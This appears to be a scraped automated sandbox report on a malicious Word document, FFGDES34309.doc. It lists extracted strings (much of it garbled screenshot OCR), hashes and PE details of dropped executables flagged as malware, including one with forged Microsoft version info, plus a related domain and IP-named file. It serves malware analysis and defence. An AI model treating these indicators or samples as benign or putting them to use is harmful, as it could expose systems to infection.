Ansi based on Runtime Data (perdoma.exe )

LanguageList

Unicode based on Runtime Data (perdoma.exe )

LegalCopyright

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

LElevated.EXE

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

MaxFileSize

Unicode based on Runtime Data (perdoma.exe )

memmove

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

MessageBoxA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

msvcrt.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

ntdll.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

OLEAUT32.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.40D000.00000002.mdmp)

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

pdh.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

PdhCalculateCounterFromRawValue

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

PdhOpenQueryA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

ProxyEnable

Unicode based on Runtime Data (perdoma.exe )

putwc

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

ription

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

SavedLegacySettings

Unicode based on Runtime Data (perdoma.exe )

ScreenToClient

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

strcat

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

StringFileInfo

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

strtoul

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

t$0%k^

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

Translation

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

UNCAsIntranet

Unicode based on Runtime Data (perdoma.exe )

USER32.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

VS_VERSION_INFO

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

VWSVV

Ansi based on Runtime Data (perdoma.exe )

wwwwwwwwwwwwwwwwwwwww

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

wwwwwwwwwwwwwx

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

xwxwxx

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

.n.__ar

Ansi based on Image Processing (screen_0.png)

0_____0

Ansi based on Image Processing (screen_0.png)

___-_-m_

Ansi based on Image Processing (screen_0.png)

_____

Ansi based on Image Processing (screen_0.png)

______

Ansi based on Image Processing (screen_0.png)

_______

Ansi based on Image Processing (screen_0.png)

___L_

Ansi based on Image Processing (screen_0.png)

_aBbCcl

Ansi based on Image Processing (screen_0.png)

_m,,k,,,,,.

Ansi based on Image Processing (screen_0.png)

_such'n_

Ansi based on Image Processing (screen_0.png)

A_BbCc_

Ansi based on Image Processing (screen_0.png)

AaBbCcI

Ansi based on Image Processing (screen_0.png)

Ab_a_

Ansi based on Image Processing (screen_0.png)

Anc_cht

Ansi based on Image Processing (screen_0.png)

and,rn'

Ansi based on Image Processing (screen_0.png)

B,arb,_t,n

Ansi based on Image Processing (screen_0.png)

E_nf_g_n

Ansi based on Image Processing (screen_0.png)

E_nt'J__n

Ansi based on Image Processing (screen_0.png)

Farmaharlag,n

Ansi based on Image Processing (screen_0.png)

H,Narh,

Ansi based on Image Processing (screen_0.png)

l_XU___x,x'__ll'_b__A_ll_____-__--_--_-_=l_l____l

Ansi based on Image Processing (screen_0.png)

nstandard_Farmahar!a9'n

Ansi based on Image Processing (screen_0.png)

s___n__0ut

Ansi based on Image Processing (screen_0.png)

s_ndung_n

Ansi based on Image Processing (screen_0.png)

Schr_ftak

Ansi based on Image Processing (screen_0.png)

ub_rpr__n

Ansi based on Image Processing (screen_0.png)

v_m__c_

Ansi based on Image Processing (screen_0.png)

Zw__ch,nabla

Ansi based on Image Processing (screen_0.png)

'_i___ar:a

Ansi based on Image Processing (screen_1.png)

,_,,e____

Ansi based on Image Processing (screen_1.png)

-Farmaharla9in

Ansi based on Image Processing (screen_1.png)

..-.'J

Ansi based on Image Processing (screen_1.png)

.iil._'0'i'il__.

Ansi based on Image Processing (screen_1.png)

00________,0

Ansi based on Image Processing (screen_1.png)

0____

Ansi based on Image Processing (screen_1.png)

_..,..

Ansi based on Image Processing (screen_1.png)

_.0__

Ansi based on Image Processing (screen_1.png)

__-___-_

Ansi based on Image Processing (screen_1.png)

___-_-._._.

Ansi based on Image Processing (screen_1.png)

__________:.__--,____

Ansi based on Image Processing (screen_1.png)

______i____

Ansi based on Image Processing (screen_1.png)

a'ndirn

Ansi based on Image Processing (screen_1.png)

Ancicht_

Ansi based on Image Processing (screen_1.png)

Bgarbgitgn

Ansi based on Image Processing (screen_1.png)

Einf_gin

Ansi based on Image Processing (screen_1.png)

Einfa9in_

Ansi based on Image Processing (screen_1.png)

FFGD_S34309_Kcmcati_iliti'tsmcdus_-Micr0s0ftW0rd

Ansi based on Image Processing (screen_1.png)

Formahor_aggn

Ansi based on Image Processing (screen_1.png)

HiNarhi

Ansi based on Image Processing (screen_1.png)

iibirprMin

Ansi based on Image Processing (screen_1.png)

l__'_.::'_.::'_._l

Ansi based on Image Processing (screen_1.png)

l_xu__x,x'__ll'ib_A_ll-_--_-----_-----_l

Ansi based on Image Processing (screen_1.png)

Markiirin

Ansi based on Image Processing (screen_1.png)

nstandard

Ansi based on Image Processing (screen_1.png)

Schriftak

Ansi based on Image Processing (screen_1.png)

Si_inl_0ut

Ansi based on Image Processing (screen_1.png)

Sindungin

Ansi based on Image Processing (screen_1.png)

Vimiici

Ansi based on Image Processing (screen_1.png)

Zwi_chinabla.

Ansi based on Image Processing (screen_1.png)

0C?____?_,0

Ansi based on Image Processing (screen_2.png)

_,__ar

Ansi based on Image Processing (screen_2.png)

_-=_-=

Ansi based on Image Processing (screen_2.png)

___0_

Ansi based on Image Processing (screen_2.png)

_______J

Ansi based on Image Processing (screen_2.png)

_Farm,,ahd,a,r,la.9'n

Ansi based on Image Processing (screen_2.png)

_L___

Ansi based on Image Processing (screen_2.png)

_smop

Ansi based on Image Processing (screen_2.png)

B'arb'_t'n

Ansi based on Image Processing (screen_2.png)

E_nt_9'n_

Ansi based on Image Processing (screen_2.png)

Farmaharlag'n

Ansi based on Image Processing (screen_2.png)

H'Narh'

Ansi based on Image Processing (screen_2.png)

qm,,k,,,,,.

Ansi based on Image Processing (screen_2.png)

u_-_x,x'_-ll'_b-_A-ll__-__--_--_---_=l_l_-_-l

Ansi based on Image Processing (screen_2.png)

Zw__ch'nabla

Ansi based on Image Processing (screen_2.png)

______g

Ansi based on Image Processing (screen_3.png)

Einf_9in_

Ansi based on Image Processing (screen_3.png)

Einfegin

Ansi based on Image Processing (screen_3.png)

l__''_:::''_:::''_:_l

Ansi based on Image Processing (screen_3.png)

we_i_0

Ansi based on Image Processing (screen_3.png)

.,______

Ansi based on Image Processing (screen_4.png)

._.__-_-._._..

Ansi based on Image Processing (screen_4.png)

0__,__,

Ansi based on Image Processing (screen_4.png)

;='_-_'__'t-_-.t-_-.

Ansi based on Image Processing (screen_4.png)

_'^_JT

Ansi based on Image Processing (screen_4.png)

_-----_l_l__''_:::''_:::''_:_l

Ansi based on Image Processing (screen_4.png)

_.__-_-_--'--'-

Ansi based on Image Processing (screen_4.png)

__________:.__--____._

Ansi based on Image Processing (screen_4.png)

_______Suchin'

Ansi based on Image Processing (screen_4.png)

_A_ll-_--_-----

Ansi based on Image Processing (screen_4.png)

Ancicht

Ansi based on Image Processing (screen_4.png)

Biarbiitin

Ansi based on Image Processing (screen_4.png)

Farmahar_agin

Ansi based on Image Processing (screen_4.png)

FFGD_S34309_Kcmcati_iliti'tsmcdus_-Micr0s0_lN0rd

Ansi based on Image Processing (screen_4.png)

HiNarhi...

Ansi based on Image Processing (screen_4.png)

i'ndirn

Ansi based on Image Processing (screen_4.png)

imitNmROman

Ansi based on Image Processing (screen_4.png)

Marklirin

Ansi based on Image Processing (screen_4.png)

Rucc;cch

Ansi based on Image Processing (screen_4.png)

schriftak

Ansi based on Image Processing (screen_4.png)

si_i:1v0n1

Ansi based on Image Processing (screen_4.png)

u__x,

Ansi based on Image Processing (screen_4.png)

wedi_0

Ansi based on Image Processing (screen_4.png)

x'__ll'ib

Ansi based on Image Processing (screen_4.png)

zwi_chinab_a.

Ansi based on Image Processing (screen_4.png)

_,0__

Ansi based on Image Processing (screen_5.png)

_8___

Ansi based on Image Processing (screen_5.png)

_______g

Ansi based on Image Processing (screen_5.png)

_i'ii__

Ansi based on Image Processing (screen_5.png)

En91;cch(uIAt

Ansi based on Image Processing (screen_5.png)

i''__i_i

Ansi based on Image Processing (screen_5.png)

iii_'0

Ansi based on Image Processing (screen_5.png)

0___'__0e_

Ansi based on Image Processing (screen_6.png)

_i'ii__r

Ansi based on Image Processing (screen_6.png)

0__=?9_0,

Ansi based on Image Processing (screen_7.png)

???__???s??___

Ansi based on Image Processing (screen_7.png)

_?___

Ansi based on Image Processing (screen_7.png)

___---J

Ansi based on Image Processing (screen_7.png)

Extracted Files

Malicious 2

g545[1].exe

Download Disabled Extended File Details VirusTotal Report Hash Seen Before

Size
215KiB (219648 bytes)

Type
PE32 executable (console) Intel 80386, for MS Windows

AV Scan Result
Labeled as "QVM20.1.Malware" (2/54)

MD5

d88c2bed761c7384d0e8657477af9da7

SHA1

d3fe6e30572457bd8ce5b5258b0e7eb7e5689a10

SHA256

ab8fc800b3974b0b41bf6a5d74bb6932239c27a1a95cd4c128af2057b6909a5f

Extended File Details

g545[1].exe

Filename: g545[1].exe
Size: 215KiB (219648 bytes)
Type: PE32 executable (console) Intel 80386, for MS Windows
Architecture
: 32 Bit
MD5
: d88c2bed761c7384d0e8657477af9da7
SHA1
: d3fe6e30572457bd8ce5b5258b0e7eb7e5689a10
SHA256
: ab8fc800b3974b0b41bf6a5d74bb6932239c27a1a95cd4c128af2057b6909a5f
SHA512
: 27fca6eb19b322fa52603da04cbd7ce738c51862219f63323a2003aa772b894e7959dfafd16304cbcf2eba9d77c4047d57eff74d47d74172dc9ce01bbed9c4e6
ssdeep
: 3072:TH8HmyOTBO4vKajNMPWqgVuLcXIwAlEp3TygMUJVYYPwCx:bx5MajlVAcYwAemgMWwC
imphash
: fd111c31534d28d04de5bf9876f1c41f
authentihash
: 369183826ece0f11d2ce682fea019a5d084279d031e869e4b1cffe2bde0676cc
Compiler/Packer
: Microsoft Visual C++ V8.0 (Debug)

Version Info

InternalName: RunLegacyCPLElevated
FileVersion: 6.3.7603.16385 (win7_rtm.090713-1255)
CompanyName: Microsoft Corporation
ProductName: Microsoft Windows Operating System
ProductVersion: 6.3.7603.16385
FileDescription: Run a legacy CPL elevated
OriginalFilename: RunLegacyCPLElevated.EXE
Translation: 0x0409 0x04b0

File Sections

Details	Name	Entropy	Virtual Address	Virtual Size	Raw Size	MD5
Name .text Entropy 5.00204922369 Virtual Address 0x1000 Virtual Size 0xbda5 Raw Size 0xbe00 MD5 d2dc77d5487a51e5fc2dfbaea755d90f	.text	5.00204922369	0x1000	0xbda5	0xbe00	d2dc77d5487a51e5fc2dfbaea755d90f
Name .rdata Entropy 1.85885084356 Virtual Address 0xd000 Virtual Size 0x252 Raw Size 0x400 MD5 5b0b5b3ca24572bf56bdf1ab7f41ec4e	.rdata	1.85885084356	0xd000	0x252	0x400	5b0b5b3ca24572bf56bdf1ab7f41ec4e
Name .data Entropy 1.99064793608 Virtual Address 0xe000 Virtual Size 0x1f74 Raw Size 0xa00 MD5 2d606028eec2decaffbc49de77709d38	.data	1.99064793608	0xe000	0x1f74	0xa00	2d606028eec2decaffbc49de77709d38
Name .idata Entropy 2.7521044454 Virtual Address 0x10000 Virtual Size 0x723 Raw Size 0x800 MD5 e9ca1d1f0c71614eff3d8c159cc1622a	.idata	2.7521044454	0x10000	0x723	0x800	e9ca1d1f0c71614eff3d8c159cc1622a
Name n_yv Entropy 5.92844255047 Virtual Address 0x11000 Virtual Size 0xa664 Raw Size 0xa800 MD5 3c92df578eb8135ba82f01c19c5165ba	n_yv	5.92844255047	0x11000	0xa664	0xa800	3c92df578eb8135ba82f01c19c5165ba
Name hSho Entropy 6.38534290029 Virtual Address 0x1c000 Virtual Size 0x8e18 Raw Size 0x9000 MD5 59d956e1d83c8dd1318684a5a5dc6b34	hSho	6.38534290029	0x1c000	0x8e18	0x9000	59d956e1d83c8dd1318684a5a5dc6b34
Name yzA0 Entropy 5.84108505974 Virtual Address 0x25000 Virtual Size 0x8bde Raw Size 0x8c00 MD5 c364b62cbfcd7be87647f2221595a972	yzA0	5.84108505974	0x25000	0x8bde	0x8c00	c364b62cbfcd7be87647f2221595a972
Name .rsrc Entropy 6.22350226208 Virtual Address 0x2e000 Virtual Size 0xbd20 Raw Size 0xbe00 MD5 6ded67bdf4599d7a9dc6f50988181950	.rsrc	6.22350226208	0x2e000	0xbd20	0xbe00	6ded67bdf4599d7a9dc6f50988181950

File Imports

ClusterNetworkEnum

CreateHardLinkW

DisconnectNamedPipe

EnumUILanguagesA

FillConsoleOutputCharacterA

FoldStringW

FreeConsole

GetCommProperties

GetCPInfoExW

GetEnvironmentStrings

GetProfileStringA

GetVolumeNameForVolumeMountPointW

GetWriteWatch

is_wctype

putwc

_chkstk

isdigit

memmove

sin

strcat

strtoul

VarCyRound (Ordinal #310)

PdhCalculateCounterFromRawValue

PdhOpenQueryA

MessageBoxA

ScreenToClient

perdoma.exe

Download Disabled VirusTotal Report Hash Seen Before

Size
215KiB (219648 bytes)

Type
PE32 executable (console) Intel 80386, for MS Windows

AV Scan Result
Labeled as "QVM20.1.Malware" (2/54)

MD5

d88c2bed761c7384d0e8657477af9da7

SHA1

d3fe6e30572457bd8ce5b5258b0e7eb7e5689a10

SHA256

ab8fc800b3974b0b41bf6a5d74bb6932239c27a1a95cd4c128af2057b6909a5f

Informative 19
- 021404ae7ed34c62769bc54bbab242b6_e47c61d2-1dae-480e-827a-ae8d797649df
  
  Download Disabled Hash Seen Before
  
  Size
  4.5KiB (4564 bytes)
  
  Type
  data
  
  MD5
  
  04bc3463fb790a50465910062eec173a
  
  SHA1
  
  5194d6668b87b5256fb187a8c5b37cf92d013651
  
  SHA256
  
  8e823745244c4bca606a45dab0f2b8d78ff9c493f363adf90aec2a1fd1e2be63
- FFGDES34309.LNK
  
  Download Disabled Hash Seen Before
  
  Size
  394B (394 bytes)
  
  Type
  MS Windows shortcut, Item id list present, Points to a file or directory, Normal, ctime=Fri Jan 29 19:13:42 2016, mtime=Fri Jan 29 19:13:42 2016, atime=Fri Jan 29 19:13:42 2016, length=91136, window=hide
  
  MD5
  
  ed7a6c0079639ba2a3257716e5453870
  
  SHA1
  
  -
  
  SHA256
  
  4178dcc06b8f92c8ac9d539359c7ee08d6c063245f002e0443e5825262e4b6fe
- Local Disk (Z).LNK
  
  Download Disabled Hash Seen Before
  
  Size
  275B (275 bytes)
  
  Type
  MS Windows shortcut, Item id list present, Points to a file or directory, Directory, ctime=Fri Jan 29 17:14:31 2016, mtime=Fri Jan 29 17:15:41 2016, atime=Fri Jan 29 17:15:41 2016, length=4096, window=hide
  
  MD5
  
  b89ab8a103ce02e6f44581a2e3bcc1a1
  
  SHA1
  
  -
  
  SHA256
  
  612ab95be62bf9f43730558a7aee17298f17f61469c0ee0e297d172a2e03e520
- index.dat
  
  Download Disabled Hash Seen Before
  
  Size
  76B (76 bytes)
  
  Type
  data
  
  MD5
  
  19e6f31e2bf67ce5f9b7ae02634fed35
  
  SHA1
  
  c69c32ffdbaab2e4337d3a091b599f54309c205a
  
  SHA256
  
  812892a42c0b322d26081ad80e2956f3b4e6bf9af28e0083a52f50ee3f1e3e72
- VB12.pip
  
  Download Disabled Hash Seen Before
  
  Size
  144B (144 bytes)
  
  Type
  data
  
  MD5
  
  f1ffec5d2f119ae9f0a7f189a3a0693c
  
  SHA1
  
  0eb7b09e415cc9aab28066fddc58823bae0bbdf8
  
  SHA256
  
  665e1cfacb41c40cdbaa070fcd0df6dac94d7156416c6f1faa61371586842606
- 85_143_166_200[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  438KiB (448556 bytes)
  
  Type
  data
  
  MD5
  
  f70ef85a7bbc9530410ba371c97fbf61
  
  SHA1
  
  930717acbc90cd258cf7b1e3b49296eb33516c7d
  
  SHA256
  
  948d2af328c6c43fdbe9e72f85e5c4f2132be0e42cc12c457fcb8b4f3a87337d
- ~WRS{2D69C431-B530-4726-8F4A-0C1170282BCC}.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  1KiB (1024 bytes)
  
  Type
  FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
  
  MD5
  
  5d4d94ee7e06bbb0af9584119797b23a
  
  SHA1
  
  dbb111419c704f116efa8e72471dd83e86e49677
  
  SHA256
  
  4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
- 94308059B57B3142E455B38A6EB92015
  
  Download Disabled Hash Seen Before
  
  Size
  50KiB (51036 bytes)
  
  Type
  data
  
  MD5
  
  8d11d80c1050eb816fc59253d881ad41
  
  SHA1
  
  e01c83a712655b85f8a5672cf903085cbbdfb340
  
  SHA256
  
  a46de94fc6cf9ba4f7005c3e8588681ea2ffdd87b9ceb7bb50347edc848934d5
- opa12.dat
  
  Download Disabled Hash Seen Before
  
  Size
  25KiB (25216 bytes)
  
  Type
  data
  
  MD5
  
  3aa61b6d7cfbb6723713b9ff5db347f0
  
  SHA1
  
  6513b0bed12fc978009b42e07eb045c1cf1019ff
  
  SHA256
  
  6a57df15662951120f13710547ac98c9faf18abacb5def17257752e71659d31c
- 368968.cvr
  
  Download Disabled Hash Seen Before
  
  Size
  1.9KiB (1936 bytes)
  
  Type
  data
  
  MD5
  
  0a65be7299cb76b1f0ca77a66080d71c
  
  SHA1
  
  d88c768e981983b8d156314470baaa23541b4ca2
  
  SHA256
  
  0f2034133550cb6d2c6f79c273d0c651811743b0293645e9b645d9170d790727
- 369281.od
  
  Download Disabled Hash Seen Before
  
  Size
  134B (134 bytes)
  
  Type
  ASCII text, with CRLF line terminators
  
  MD5
  
  83ce017aa683159cf98a78ddf1d27f58
  
  SHA1
  
  5f3d2373c5cffc5cc5964fab8445b93270e55124
  
  SHA256
  
  8296a8c57c35efde96897eb73fe290660fe7deed863131c1f1e51f0a6f9cf7c7
- CabC49E.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  49KiB (50006 bytes)
  
  Type
  Microsoft Cabinet archive data, 50006 bytes, 1 file
  
  MD5
  
  6dccd66b61cf0660a455a6169650af91
  
  SHA1
  
  990e4dcf5284de900674742326d02746466917f6
  
  SHA256
  
  3d5564a752a73b7e4b044144f93c4a649ff37a6a6ab9a3a745975fe4eb1f514c
- CabC4EE.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  49KiB (50006 bytes)
  
  Type
  Microsoft Cabinet archive data, 50006 bytes, 1 file
  
  MD5
  
  6dccd66b61cf0660a455a6169650af91
  
  SHA1
  
  990e4dcf5284de900674742326d02746466917f6
  
  SHA256
  
  3d5564a752a73b7e4b044144f93c4a649ff37a6a6ab9a3a745975fe4eb1f514c
- CabDAE9.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  48KiB (49660 bytes)
  
  Type
  Microsoft Cabinet archive data, 49660 bytes, 1 file
  
  MD5
  
  ce0db40ef197d9b809969c1ab8fd94e0
  
  SHA1
  
  e3ea0e25cfafb90b2bb77f267441cc6d0b3f971e
  
  SHA256
  
  e4cc7a1e1fa15e6610818c9512bbb47089f5c909c354d7f4e7fd18bef22c622f
- TarC49F.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  115KiB (117737 bytes)
  
  Type
  data
  
  MD5
  
  f4252d3237a3548e78a31783272bb94c
  
  SHA1
  
  546f8f8b3903b0e4a627da52cfe0901ca0229142
  
  SHA256
  
  da1df45dcd494958f8cc5feabb934f1e39466654d674012450ae9e3160733792
- TarC4EF.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  115KiB (117737 bytes)
  
  Type
  data
  
  MD5
  
  f4252d3237a3548e78a31783272bb94c
  
  SHA1
  
  546f8f8b3903b0e4a627da52cfe0901ca0229142
  
  SHA256
  
  da1df45dcd494958f8cc5feabb934f1e39466654d674012450ae9e3160733792
- TarDAEA.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  114KiB (116736 bytes)
  
  Type
  data
  
  MD5
  
  74e656daad50db3d7fdc775f46581905
  
  SHA1
  
  23ae2c0fc17351637247293cf45ceaf0f95bd312
  
  SHA256
  
  1381bbdd25b7a9a146dc77bf19f71e82d9249de6376e3d70c0c4890ce480438d
- MSForms.exd
  
  Download Disabled Hash Seen Before
  
  Size
  159KiB (162688 bytes)
  
  Type
  data
  
  MD5
  
  416c30c5695d94f415e0928288a5f47c
  
  SHA1
  
  1cc42baa96a9b80ed9a9fbf2c6291dc476dba66f
  
  SHA256
  
  3b5c2e6782a815e639cce33c41752363d6a162b5df506f761810c9b1a7024f57
- carved_0.exe
  
  Download Disabled
  
  Size
  215KiB (219648 bytes)
  
  Context
  jjcoll.in

Notifications

Runtime

Added comment to VirusTotal report

Not all sources for signature ID "binary-0" are available in the report

Not all sources for signature ID "hooks-8" are available in the report

Not all sources for signature ID "mutant-0" are available in the report

Parsed the maximum number of dropped files (20), report might not contain information about some dropped files

Community

There are no community comments.

You must be logged in to submit a comment.

FFGDES34309.doc

Incident Response

Risk Assessment

Indicators

Malicious Indicators 15

Suspicious Indicators 11

Informative 10

File Details

FFGDES34309.doc

Resources

Visualization

Classification (TrID)

Screenshots

System Resource Monitor

Hybrid Analysis

Network Analysis

DNS Requests

Contacted Hosts

Contacted Countries

HTTP Traffic

Extracted Strings

Extracted Files

Malicious 2

g545[1].exe

perdoma.exe

Informative 19

021404ae7ed34c62769bc54bbab242b6_e47c61d2-1dae-480e-827a-ae8d797649df

FFGDES34309.LNK

Local Disk (Z).LNK

carved_0.exe

Notifications

Runtime

Community

Vetting required

Request Report Deletion

Link